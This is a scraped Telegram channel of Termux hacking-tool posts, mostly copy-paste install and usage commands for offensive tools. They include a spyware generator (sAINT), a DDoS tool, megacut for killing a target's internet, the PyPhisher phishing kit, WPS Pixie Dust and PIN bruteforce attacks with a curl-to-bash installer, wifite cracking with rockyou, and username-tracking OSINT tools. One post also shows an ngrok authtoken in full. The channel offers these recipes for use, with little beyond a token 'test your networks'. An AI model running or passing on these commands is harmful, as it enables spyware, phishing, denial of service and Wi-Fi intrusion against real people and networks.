Termux
2.19K subscribers
670 photos
83 videos
407 files
739 links
Termux-Collection
Download Telegram
ยถยถ sAINT

a Spyware Generator for Windows systems written in Java. [Discontinued]
The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language.

๐Ÿ“apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y
๐Ÿ“apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses6 -y
ยถยถ On Windows, install the latest Java JRE 8 from Oracle = https://www.java.com/en/download/z

๐Ÿ“git clone https://github.com/tiagorlampert/sAINT.git
๐Ÿ“cd sAINT
๐Ÿ“chmod +x configure.sh
๐Ÿ“./configure.sh

# Run
๐Ÿ“java -jar sAINT.jar

ยถยถ Youtube Link =

https://github.com/tiagorlampert/sAINT
ยถยถ RDDoS_Tool
RedDDoS Tool is a tool for DDoS attacks. You can test networks/servers/any other devices with it
#ddos #network #ip #flood

๐Ÿ“pip install tqdm
๐Ÿ“pip install pyfiglet
๐Ÿ“apt-get update -y
๐Ÿ“apt-get install git
๐Ÿ“git clone https://github.com/Red-company/RDDoS_Tool.git
๐Ÿ“cd RDDoS_Tool
๐Ÿ“bash setup.sh
๐Ÿ“python3 RDDoS_Tool.py
Forwarded from Deleted Account
Nethunter permission error fix
Download the file (nethunter.sh)

Open terminal AndroidSu
type
su
sd sdcard or /sdcard
sh nethunter.sh when you see done (restart device your nethunter will work got this error on latest version and fixed on samsung note 10 plus and samsung note 9 = V-12
https://youtu.be/IApHZBgVfZ8
This media is not supported in your browser
VIEW IN TELEGRAM
NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within few seconds. The goal behind this tool was to get results quickly while maintaining low amounts of false positives.

๐Ÿ“git clone https://github.com/thewhiteh4t/nexfil.git
๐Ÿ“cd nexfil
๐Ÿ“pip3 install -r requirements.txt

ยถยถ Usage :

usage: nexfil.py [-h] [-u U] [-f F] [-l L] [-t T] [-v] [-U]

nexfil - Find social media profiles on the web | v1.0.1

options:
-h, --help show this help message and exit
-u U Specify username
-f F Specify a file containing username list
-l L Specify multiple comma separated usernames
-t T Specify timeout [Default : 5]
-v Prints version
-U Check for Updates

ยถยถ Single username

python3 nexfil.py -u username
Multiple comma separated usernames

python3 nexfil.py -l "user1,user2"
Username list in a file

python3 nexfil.py -f users.txt
ยถยถ Stryker - mobile pentest
--Root-Your-Device-1st--

#android #kekstore #pwnterm #kekhunter #materialhunter #stryker
#pixiedust
#bruteforcepin
#connectwithpin
#passwordbruteforce
#wordlist
#capturehandshake
#clientdeauthing

Test your networks for the most effective and dangerous vulnerabilities!

ยถยถDownload Stryker APK -Link Below
https://stryker.zalex.dev/
https://zalex.dev/stryker/#download
ยถยถ Stryker - mobile pentest
--Root-Your-Device-1st--

#android #kekstore #pwnterm #kekhunter #materialhunter #stryker
#pixiedust
#bruteforcepin
#connectwithpin
#passwordbruteforce
#capturehandshake
#clientdeauthing

Test your networks for the most effective and dangerous vulnerabilities!

ยถยถDownload Stryker APK -Link Below
https://stryker.zalex.dev/
https://zalex.dev/stryker/#download

ยถยถGithub = https://github.com/stryker-project/app/releases


ยถยถ The Stryker Project โ€” user-friendly app for mobile pentest.
Status: Coding
Git: https://github.com/stryker-project

ยถยถ If you need help join telegram channel
@strykereng <- Channel with news and updates [ENG]
@strykerapp <- Channel with news and updates [RU]
@strykerchat <- Chat with developer

ยถยถ Mini dongle /works with samsungNote9 /no need to install drivers

ยถยถ Aliexpress
MVR 44.09 31%OFF | 300Mbps 5dBi USB WiFi Adapter Mini Dongle External Wireless LAN Network Card 2.4GHz 802.11n/g/b for PC Computer for Win 7 8 10
https://a.aliexpress.com/_m0ThS86

ยถยถ extra long antenna
2.4G 10dBi High Gain Antenna
length: 400mm
https://a.aliexpress.com/_mObNMlc

ยถยถ Amazone
Alfa AWUS036NHA - Wireless B/G/N USB Adaptor - 802.11n - 150Mbps - 2.4 GHz - 5dBi Antenna - Long Range - Atheros Chipset - Windows XP/Vista 64-Bit /128-Bit Windows 7 Compatible https://www.amazon.com/dp/B004Y6MIXS/ref=cm_sw_r_awdo_PBARX7TVSMGAHW6M38Z7
ยถยถ megacut

A new powerful Python3 tool for managing internet on a local network

๐Ÿ“git clone https://github.com/stryker-project/megacut
๐Ÿ“cd megacut
๐Ÿ“pip install -r requirements.txt
๐Ÿ“python3 megacut.py

ยถยถ Options & Syntax
python3 megacut.py target gateway -m\-k\-b\-r

-k Kill inet on target ip

-m Permanently disable inet on target (only if -k not works)

-b Disable inet for 20 seconds

-r Restore inet on target ip

ยถยถ Examples:
python3 megacut.py 192.168.1.101 192.168.1.1 -k
๐Ÿ‘1
Forwarded from Cyryx college
Media is too big
VIEW IN TELEGRAM
ยถยถInstall ngrok on termux
Open chrome

ยถยถGo to
https://dashboard.ngrok.com/signup
Signup with a new gmail
aftee that go to termux and copy past this

๐Ÿ“wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz
ยถยถ when download is completed

( to extract it type )
๐Ÿ“tar vxzf ngrok-v3-stable-linux-arm64.tgz

ยถยถNow go back to chrome ngrok page and lets add our ngrok token copy it full

Example = ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
( add ./ after that full link )
ยถยถGo back to termux and past i with ./
๐Ÿ“./ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L

(Open Hotspot in your phone ) before using
๐Ÿ‘1
ยถยถ Seema
#wordlist
a random password generator tool which generates a random password of your choice. If you wants easy password, then it will generate a random easy password and give you and ask from you whether you wants to save or not. If you doesn't want to save your password and it will stop processing but if you wants to save your password then, it will ask from you a name for your password.

๐Ÿ“apt-get update && apt-get upgrade -y
๐Ÿ“apt-get install python git -y
๐Ÿ“git clone https://github.com/adarshaddee/Seema.git
๐Ÿ“cd Seema
๐Ÿ“chmod +x setup.sh
๐Ÿ“./setup.sh

OR YOU CAN USE

๐Ÿ“pip install -r requirements.txt
๐Ÿ“python Seema.py

------------------------------------------------


Random-Password-Generator

Program written by Python Language

Requirements

apt update && apt upgrade pkg install python pip install requests

Run

cd Random-Password-Generator python gen_rand_passwd.py
This media is not supported in your browser
VIEW IN TELEGRAM
WPS PIN attacks Pixie Dust, online bruteforce, without monitor mode with the wpa_supplicant

Using installer
curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

ยถยถ Manually Installing requirements
๐Ÿ“pkg install -y root-repo
๐Ÿ“pkg install -y git tsu python
๐Ÿ“wpa-supplicant pixiewps iw


ยถยถ Getting OneShot

๐Ÿ“git clone --depth 1 https://github.com/drygdryg/OneShot OneShot


ยถยถ Running
๐Ÿ“sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

ยถยถ Start Pixie Dust attack on a specified BSSID:
๐Ÿ“sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

ยถยถ Show avaliable networks and start
๐Ÿ“sudo python3 oneshot.py -i wlan0 -K

ยถยถ Launch online WPS bruteforce
๐Ÿ“sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234


ยถยถ Start WPS push button connection:s

๐Ÿ“sudo python3 oneshot.py -i wlan0 --pbc

ยถยถ Troubleshooting check this link below and give it a try it .tested on samsung note10 plus / and as u can see it works for me

๐Ÿ“https://github.com/drygdryg/OneShot
๐Ÿ‘1
ยถยถ wpspin

WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their default PINs. The PIN can be used with programs like Reaver, Bully or OneShot to recover Wi-Fi password.

Installation
๐Ÿ“pip install wpspin
Or you can install from source with:

๐Ÿ“git clone https://github.com/drygdryg/wpspin.git
๐Ÿ“cd wpspin/
๐Ÿ“python setup.py install

Example:

๐Ÿ“$ wpspin 54:A0:50:75:D2:40
โค1
Media is too big
VIEW IN TELEGRAM
ยถยถ PyPhisher /65Tools
#phishing #socialmedia #kalinethunter #termux

Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others

git clone https://github.com/KasRoudra/PyPhisher
cd PyPhisher
python3 pyphisher.py

ยถยถ Or, directly run

wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
ยถยถ Golismero
Web Application Vulnerability Scanner




sudo bash
apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan cd /opt
git clone https://github.com/golismero/golismero.git
cd golismero
pip install -r requirements.txt pip install -r requirements_unix.txt
ln -s /opt/golismero/golismero.py /usr/bin/golismero

exit
โค1๐Ÿ‘1
ยถยถ JFScan lets you utilize Masscan to scan for open ports and use Nmap scripts on discovered ports to scan for services. JFScan allows you to run a scan of many different targets using the targets flag(-t) followed by a text file with the domain/IP/URL listed inside.

๐Ÿ“sudo apt install libpcap-dev git clone https://github.com/robertdavidgraham/masscan
๐Ÿ“cd masscan
๐Ÿ“make
๐Ÿ“sudo make install
๐Ÿ“sudo setcap CAP_NET_RAW+ep /usr/bin/masscan

ยถยถ to install JFScan back in your home directory
๐Ÿ“cd ~
๐Ÿ“git clone https://github.com/nullt3r/jfscan.git $ ๐Ÿ“cd jfscan
๐Ÿ“pip3 install .


usage:
jfscan [-h] -t TARGETS [--resolvers RESOLVERS] [-m MODULES] (-p PORTS | -tp TOP_PORTS) [-r MAX_RATE] [-oi] [-od] [-q] [--nmap] [--nmap-options NMAP_OPTIONS] [--nmap-threads NMAP_THREADS] [--nmap-output NMAP_OUTPUT]
ยถยถ sherlock
#sherlock #socialmedia #info #nethunter #termux

๐Ÿ“git clone https://github.com/sherlock-project/sherlock.git

๐Ÿ“cd sherlock
๐Ÿ“python3 -m pip install -r requirements.txt
๐Ÿ“python3 sherlock --help

ยถยถ To search for only one user:
๐Ÿ“python3 sherlock user123

ยถยถ To search for more than one user:
๐Ÿ“python3 sherlock user1 user2 user3
ยถยถ This package contains the rockyou.txt wordlist and has an installation size of 134 MB.
#wordlist #rockyou #fern
๐Ÿ“sudo apt install wordlists
๐Ÿ“wordlists -h
> wordlists ~ Contains the rockyou wordlist /usr/share/wordlists
|--dirb |--dirbuster
|--dnsmap.txt
|--fasttrack.txt
|--fern-wifi
|--metasploit
|--nmap.lst
|--rockyou.txt.gz
|--seclists
|--wfuzz
#wifite /
to make it easy and fast

๐Ÿ“sudo wifite -i wlan0 --ignore-locks --keep-ivs -p 1337 -mac --random-mac -v -inf --bully --pmkid --dic /usr/share/wordlists/rockyou.txt --require-fakeauth --nodeauth --wps --pmkid-timeout 120
๐Ÿ‘1
wifite.txt
4.4 KB
#wifite / all commands v3
#pyrit erro fix
#wifte

ยถยถ If you run into any problems installing Pyrit. You may need to install the following packages and reinstall.

๐Ÿ“apt install python2 build-essential python2-dev libpcap-dev libssl-dev


installation:-

๐Ÿ“git clone https://github.com/JPaulMora/Pyrit.git;cd Pyrit

๐Ÿ“python2 setup.py clean;sudo python2 setup.py build;sudo python2 setup.py install
Deleted Account
Nethunter permission error fix Download the file (nethunter.sh) Open terminal AndroidSu type su sd sdcard or /sdcard sh nethunter.sh when you see done (restart device your nethunter will work got this error on latest version and fixed on samsung note 10โ€ฆ
ยถยถ put this on androidsu
copy & past in androidsu

pm grant com.offsec.nethunter android.permission.ACCESS_FINE_LOCATION

pm grant com.offsec.nethunter android.permission.ACCESS_COARSE_LOCATION

pm grant com.offsec.nethunter android.permission.READ_EXTERNAL_STORAGE


pm grant com.offsec.nethunter android.permission.WRITE_EXTERNAL_STORAGE

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_SU

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH_LOGIN
๐Ÿ‘2